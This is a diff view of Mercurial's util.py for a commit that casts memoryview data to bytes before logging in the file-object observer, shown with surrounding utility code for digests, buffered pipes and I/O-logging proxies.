util: cast memoryview to bytes...
Gregory Szorc
r41429:b141b524 default
@@ -1,4015 +1,4021 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still has deprecation warnings enabled by default. We do not
146 146 # want to display anything to standard users, so detect if we are running
147 147 # tests and only use python deprecation warnings in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % key)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
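A minimal usage sketch for digestchecker (hypothetical payload, not from this changeset): wrap a stream, drain it, then validate size and digests.

```python
import io

payload = b'some transferred data'
expected = {b'sha1': digester([b'sha1'], payload)[b'sha1']}

checker = digestchecker(io.BytesIO(payload), len(payload), expected)
while checker.read(4096):
    pass
checker.validate()  # raises error.Abort on any size or digest mismatch
```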
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
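As a rough illustration of the fallback above: on Python 3 the result is a zero-copy memoryview slice, materialized into bytes only on demand.

```python
data = b'0123456789'
view = buffer(data, 2, 4)      # memoryview over b'2345', no copy made
assert bytes(view) == b'2345'  # copying happens only when requested
```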
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class lets us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapses it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
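A sketch of the polling collaboration the class docstring describes (some_pipe_fh is hypothetical): only block in poll() when nothing is already buffered.

```python
pipe = bufferedinputpipe(some_pipe_fh)  # hypothetical pipe file object
while not pipe.closed:
    if not pipe.hasbuffer:
        # buffer is empty, so poll() cannot miss already-buffered data
        poll([pipe.fileno()])
    line = pipe.readline()
    if not line:
        break
```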
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
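For instance (hypothetical path), mapping a file avoids reading it eagerly; slices fault pages in on demand.

```python
with open('/tmp/example.bin', 'rb') as fp:  # hypothetical path
    data = mmapread(fp)   # mmap object, or '' for an empty file
    header = data[:4]     # only the touched pages are actually read
```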
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed is a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_into', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
796 data = data.tobytes()
797
792 798 self._writedata(data)
793 799
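The cast in the hunk above matters because the "in" operator iterates a memoryview element by element, and on Python 3 those elements are ints. A quick illustrative sketch (not part of the change):

```python
buf = memoryview(b'first\nsecond')
print(b'\n' in buf)            # False: int elements never equal b'\n'
print(b'\n' in buf.tobytes())  # True: bytes membership works byte-for-byte
```

Without the tobytes() cast, _writedata() would silently take its single-line branch even when the data spans several lines.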
794 800 def write(self, res, data):
795 801 if not self.writes:
796 802 return
797 803
798 804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 805 # returns the integer bytes written.
800 806 if res is None and data:
801 807 res = len(data)
802 808
803 809 if self.logdataapis:
804 810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 811
806 812 self._writedata(data)
807 813
808 814 def flush(self, res):
809 815 if not self.writes:
810 816 return
811 817
812 818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 819
814 820 # For observedbufferedinputpipe.
815 821 def bufferedread(self, res, size):
816 822 if not self.reads:
817 823 return
818 824
819 825 if self.logdataapis:
820 826 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 827 self.name, size, len(res)))
822 828
823 829 self._writedata(res)
824 830
825 831 def bufferedreadline(self, res):
826 832 if not self.reads:
827 833 return
828 834
829 835 if self.logdataapis:
830 836 self.fh.write('%s> bufferedreadline() -> %d' % (
831 837 self.name, len(res)))
832 838
833 839 self._writedata(res)
834 840
835 841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 842 logdata=False, logdataapis=True):
837 843 """Turn a file object into a logging file object."""
838 844
839 845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 846 logdata=logdata, logdataapis=logdataapis)
841 847 return fileobjectproxy(fh, observer)
842 848
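A usage sketch under Python 2 string semantics (handles and name are hypothetical): every I/O call on the proxy is mirrored to the log handle.

```python
import io

logh = io.BytesIO()          # receives the log lines
fh = io.BytesIO(b'a\nb\n')   # the file object being observed
proxy = makeloggingfileobject(logh, fh, 'src', logdata=True)
proxy.readline()             # logh now holds something like
                             # "src> readline() -> 2: a\\n"
```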
843 849 class socketobserver(baseproxyobserver):
844 850 """Logs socket activity."""
845 851 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 852 logdata=False, logdataapis=True):
847 853 self.fh = fh
848 854 self.name = name
849 855 self.reads = reads
850 856 self.writes = writes
851 857 self.states = states
852 858 self.logdata = logdata
853 859 self.logdataapis = logdataapis
854 860
855 861 def makefile(self, res, mode=None, bufsize=None):
856 862 if not self.states:
857 863 return
858 864
859 865 self.fh.write('%s> makefile(%r, %r)\n' % (
860 866 self.name, mode, bufsize))
861 867
862 868 def recv(self, res, size, flags=0):
863 869 if not self.reads:
864 870 return
865 871
866 872 if self.logdataapis:
867 873 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 874 self.name, size, flags, len(res)))
869 875 self._writedata(res)
870 876
871 877 def recvfrom(self, res, size, flags=0):
872 878 if not self.reads:
873 879 return
874 880
875 881 if self.logdataapis:
876 882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 883 self.name, size, flags, len(res[0])))
878 884
879 885 self._writedata(res[0])
880 886
881 887 def recvfrom_into(self, res, buf, size, flags=0):
882 888 if not self.reads:
883 889 return
884 890
885 891 if self.logdataapis:
886 892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 893 self.name, size, flags, res[0]))
888 894
889 895 self._writedata(buf[0:res[0]])
890 896
891 897 def recv_into(self, res, buf, size=0, flags=0):
892 898 if not self.reads:
893 899 return
894 900
895 901 if self.logdataapis:
896 902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 903 self.name, size, flags, res))
898 904
899 905 self._writedata(buf[0:res])
900 906
901 907 def send(self, res, data, flags=0):
902 908 if not self.writes:
903 909 return
904 910
905 911 self.fh.write('%s> send(%d, %d) -> %d' % (
906 912 self.name, len(data), flags, len(res)))
907 913 self._writedata(data)
908 914
909 915 def sendall(self, res, data, flags=0):
910 916 if not self.writes:
911 917 return
912 918
913 919 if self.logdataapis:
914 920 # Returns None on success. So don't bother reporting return value.
915 921 self.fh.write('%s> sendall(%d, %d)' % (
916 922 self.name, len(data), flags))
917 923
918 924 self._writedata(data)
919 925
920 926 def sendto(self, res, data, flagsoraddress, address=None):
921 927 if not self.writes:
922 928 return
923 929
924 930 if address:
925 931 flags = flagsoraddress
926 932 else:
927 933 flags = 0
928 934
929 935 if self.logdataapis:
930 936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
